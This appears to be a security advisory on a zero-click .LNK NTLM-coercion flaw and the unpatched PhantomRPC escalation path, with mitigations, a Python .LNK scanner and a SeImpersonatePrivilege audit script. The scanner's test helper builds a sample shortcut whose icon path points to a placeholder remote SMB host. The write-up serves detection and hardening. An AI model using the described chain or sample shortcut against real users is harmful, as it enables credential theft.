CVE-2026-32202: Zero-Click Windows Shell Coercion
The vulnerability permits unauthenticated attackers to perform zero-click network spoofing and NT LAN Manager (NTLM) authentication coercion via specially crafted Shortcut (.LNK) files. It was discovered as the byproduct of an incomplete patch for an earlier zero-day remote code execution (RCE) flaw, CVE-2026-21510, and the residual flaw has been actively exploited in the wild. The Russian state-sponsored threat group APT28 has weaponised it heavily in cyber-espionage campaigns targeting government, military and critical-infrastructure organisations.
Attackers deliver a maliciously crafted Shortcut (.LNK) file. When the victim merely opens the folder containing it, Windows Explorer parses the shortcut in order to render its icon. That parsing initiates a background Server Message Block (SMB) connection to an attacker-controlled server; the victim never clicks or runs the file, which is what makes the attack zero-click.
That connection carries the victim's NetNTLMv2 challenge-response (commonly called the NetNTLMv2 hash). An attacker who captures it can attempt to crack the password offline, or relay it in real time to another internal system that still accepts NTLM and authenticate there as the victim.
Execution Chain
The exploitation sequence runs in the background with no further involvement from the user:
- Namespace Parsing Initiation: The Windows Shell encounters the .LNK file and parses the embedded LinkTargetIDList to determine how the item should be displayed. The attacker abuses the Shell namespace parsing mechanism to embed a Universal Naming Convention (UNC) path directly inside an _IDCONTROLW structure, disguising the remote reference as a local Control Panel (CPL) item.
- Icon Extraction Trigger: Before ShellExecuteExW is ever invoked, the internal shell function CControlPanelFolder::GetUIObjectOf is called to extract the display icon.
- Premature Path Resolution: GetUIObjectOf in turn reaches the GetModuleMapped routine, which calls PathFileExistsW on the attacker-supplied UNC path to resolve it.
- Automatic SMB Handshake: PathFileExistsW answers by querying the file system, and for a UNC path that means contacting the named remote host. Windows therefore opens an SMB session to the attacker's server, and as part of that session setup the client authenticates with NTLM, sending the NetNTLMv2 response the attacker harvests. No code from the shortcut runs at this point; the coercion is a side effect of an existence check performed while drawing an icon.
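A hunting aid for the chain above, written here as an added example (it is not code from the page, from Microsoft, or from any published tooling): a parser for the MS-SHLLINK header, LinkTargetIDList and StringData that reports any UNC path found inside an ItemID or in the IconLocation string. It does not know the layout of the _IDCONTROLW structure the page mentions, so it treats every ItemID as opaque bytes and looks for UNC text in ANSI and in UTF-16LE at both byte alignments; the `build_sample_lnk` helper and the 203.0.113.7 address are constructed for the demonstration and nothing is contacted over the network.

```python
import re
import struct
from pathlib import Path

# Shell Link header constants from MS-SHLLINK.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
UNC_RE = re.compile(r"\\\\[A-Za-z0-9._\-]+\\[^\x00\s]*")


def parse_lnk(data: bytes) -> dict:
    """Parse the header, LinkTargetIDList and StringData of a .LNK; LinkInfo is skipped."""
    if len(data) < HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    item_ids = []
    if flags & HAS_LINK_TARGET_ID_LIST:
        idlist_size = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        end = pos + idlist_size
        while pos + 2 <= end:
            item_size = struct.unpack_from("<H", data, pos)[0]
            if item_size == 0:                              # TerminalID closes the list
                break
            item_ids.append(data[pos + 2:pos + item_size])  # ItemID data without its size field
            pos += item_size
        pos = end
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]       # LinkInfoSize covers the whole structure
    strings = {}
    for bit, name in STRING_FIELDS:                          # StringData: CountCharacters + chars, no NUL
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & IS_UNICODE:
                strings[name] = data[pos:pos + 2 * count].decode("utf-16-le", errors="replace")
                pos += 2 * count
            else:
                strings[name] = data[pos:pos + count].decode("cp1252", errors="replace")
                pos += count
    return {"flags": flags, "item_ids": item_ids, "strings": strings}


def _unc_in_blob(blob: bytes) -> set[str]:
    """Search an opaque ItemID for UNC paths as ANSI text and as UTF-16LE at both alignments."""
    views = [blob.decode("latin-1")]
    for off in (0, 1):
        chunk = blob[off:]
        chunk = chunk[:len(chunk) - len(chunk) % 2]
        views.append(chunk.decode("utf-16-le", errors="ignore"))
    return {m.group(0) for v in views for m in UNC_RE.finditer(v)}


def scan_lnk(data: bytes) -> list[tuple[str, str]]:
    """Return (location, path) for every UNC reference in the IDList or the IconLocation."""
    parsed = parse_lnk(data)
    findings = []
    for i, item in enumerate(parsed["item_ids"]):
        for path in sorted(_unc_in_blob(item)):
            findings.append((f"IDList[{i}]", path))
    icon = parsed["strings"].get("icon_location", "")
    if UNC_RE.match(icon):
        findings.append(("icon_location", icon))
    return findings


def scan_tree(root: str) -> dict[str, list[tuple[str, str]]]:
    """Scan every .lnk under root; files that are not valid shortcuts are skipped."""
    results = {}
    for p in Path(root).rglob("*.lnk"):
        try:
            hits = scan_lnk(p.read_bytes())
        except (ValueError, struct.error):
            continue
        if hits:
            results[str(p)] = hits
    return results


def build_sample_lnk(idlist_text: str, icon_location: str) -> bytes:
    """Construct a minimal .LNK whose single ItemID carries idlist_text as UTF-16LE.
    The ItemID layout is a stand-in for the test, not the control-panel structure used in the wild."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    item_data = b"\x1f" + idlist_text.encode("utf-16-le") + b"\x00\x00"
    item = struct.pack("<H", 2 + len(item_data)) + item_data
    idlist = item + b"\x00\x00"                                 # TerminalID
    icon = struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16-le")
    return header + struct.pack("<H", len(idlist)) + idlist + icon


if __name__ == "__main__":
    # Constructed samples: a documentation-range address, so nothing real is referenced.
    hostile = build_sample_lnk(r"\\203.0.113.7\share\icon", r"\\203.0.113.7\share\x.ico")
    benign = build_sample_lnk(r"C:\Windows\System32\notepad.exe", r"C:\Windows\System32\notepad.exe")
    print(scan_lnk(hostile))
    print(scan_lnk(benign))
```

Run `scan_tree` over mail-attachment quarantines, Downloads folders and the root of shared drives. Shortcuts that legitimately point at file servers will also match, so triage by the host in the path: an external address or an unknown name is the signal, an internal file server usually is not.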
The official remediation introduced a new Component Object Model (COM) object, designated ControlPanelLinkSite, engineered to act as a security gate that enforces SmartScreen verification through ShellExecuteExW before any remote code can be loaded and executed. That gate sits at ShellExecuteExW, which the icon-extraction path above never reaches, so it stops the remote code execution but not the NTLM coercion; this is the residual flaw that became CVE-2026-32202.
PhantomRPC: Unpatched Privilege Escalation
PhantomRPC is a fundamental architectural weakness, currently unpatched, in the Windows Remote Procedure Call (RPC) subsystem. By abusing endpoint mapping and the way clients handle an unavailable service, a local attacker who holds SeImpersonatePrivilege can register a fraudulent RPC server in place of a legitimate one.
Windows components talk to background services over RPC, locating them through the endpoint mapper. If the legitimate service is not running when a client looks it up, nothing verifies that whatever answers for that interface is the genuine service. An attacker with limited local access can therefore register a "phantom" RPC server that mimics the missing service.
When a highly privileged process (for example one running as SYSTEM) connects to the interface, it reaches the attacker's server instead. Because the attacker holds SeImpersonatePrivilege, a right granted by default to service accounts such as LOCAL SERVICE and NETWORK SERVICE, the phantom server can impersonate the connected SYSTEM client and obtain its token, giving full control of the machine.
Microsoft treats this as "intended architectural behaviour" rather than a vulnerability because exploitation already requires SeImpersonatePrivilege. Consequently, no CVE has been assigned and no patch is planned.
Recommendations & Mitigations
- Patching: Microsoft addressed CVE-2026-32202 in its April 2026 Patch Tuesday updates. Due to active exploitation, organisations must apply these updates immediately.
- Hardening: PhantomRPC has no patch, so the control is to limit who holds SeImpersonatePrivilege. Audit the assignment on every server (Local Security Policy > User Rights Assignment > "Impersonate a client after authentication", or export it with `secedit /export`) and remove it from any account that does not strictly need it; web and database service accounts are the usual legitimate holders, and any other entry warrants investigation.
- NTLM Defences: Require SMB signing on both clients and servers (the "Microsoft network client/server: Digitally sign communications (always)" policies, which set RequireSecuritySignature under HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters and LanmanServer\Parameters); this defeats relay of the coerced authentication to SMB targets but does not stop offline cracking, so password strength still matters. Protect other relay targets with their own controls (LDAP signing and channel binding, Extended Protection for Authentication on HTTP services). Block outbound SMB (TCP 445) at the network edge so the coercion cannot reach internet-hosted attacker servers. Transition to Kerberos, using the "Restrict NTLM: Outgoing NTLM traffic to remote servers" policy first in audit mode and then to deny NTLM wherever it is no longer needed.
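The SeImpersonatePrivilege audit from the hardening item, as an added example rather than anything from the page or from Microsoft: it parses the [Privilege Rights] section of a `secedit /export /cfg <file> /areas USER_RIGHTS` export and reports every holder beyond the Windows defaults (Administrators S-1-5-32-544, SERVICE S-1-5-6, LOCAL SERVICE S-1-5-19, NETWORK SERVICE S-1-5-20). The `SAMPLE_INF` text and its domain SID are constructed for the demonstration; the assumption that the export is UTF-16 with a BOM is handled by opening it with `encoding="utf-16"`.

```python
import re

# Default holders of SeImpersonatePrivilege on a Windows member server:
# Administrators, SERVICE, LOCAL SERVICE, NETWORK SERVICE.
DEFAULT_IMPERSONATE_SIDS = frozenset({"S-1-5-32-544", "S-1-5-6", "S-1-5-19", "S-1-5-20"})

# Constructed example of a secedit export: the well-known SIDs plus IIS_IUSRS
# (S-1-5-32-568) and a made-up domain account that should not be there.
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-32-568,*S-1-5-21-3623811015-3361044348-30300820-1106
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(inf_text: str) -> dict[str, set[str]]:
    """Return {privilege name: set of holders} from the [Privilege Rights] section.
    secedit writes SIDs as *S-1-5-...; the leading * is stripped, other names are kept verbatim."""
    rights: dict[str, set[str]] = {}
    section = None
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "privilege rights" or "=" not in line:
            continue
        name, _, value = line.partition("=")
        holders = {h.strip().lstrip("*") for h in value.split(",") if h.strip()}
        rights[name.strip()] = holders
    return rights


def audit_impersonate(inf_text: str, allowlist=frozenset(),
                      baseline=DEFAULT_IMPERSONATE_SIDS) -> tuple[list[str], list[str]]:
    """Return (unexpected holders, baseline holders that are missing).
    allowlist carries SIDs the site has reviewed and accepted, e.g. an IIS application pool group."""
    holders = parse_privilege_rights(inf_text).get("SeImpersonatePrivilege", set())
    extra = sorted(holders - baseline - set(allowlist))
    missing = sorted(baseline - holders)
    return extra, missing


def audit_export_file(path: str, allowlist=frozenset()) -> tuple[list[str], list[str]]:
    """Audit a real export; secedit writes the file as UTF-16 with a byte-order mark."""
    with open(path, encoding="utf-16") as fh:
        return audit_impersonate(fh.read(), allowlist)


if __name__ == "__main__":
    extra, missing = audit_impersonate(SAMPLE_INF, allowlist={"S-1-5-32-568"})
    print("unexpected SeImpersonatePrivilege holders:", extra)
    print("default holders missing:", missing)
```

Resolve any SID the audit reports with `whoami /user` on the account or a directory lookup, and treat a domain user or a generic service account holding the right as a finding: on an unpatched host each such account is one hop from SYSTEM.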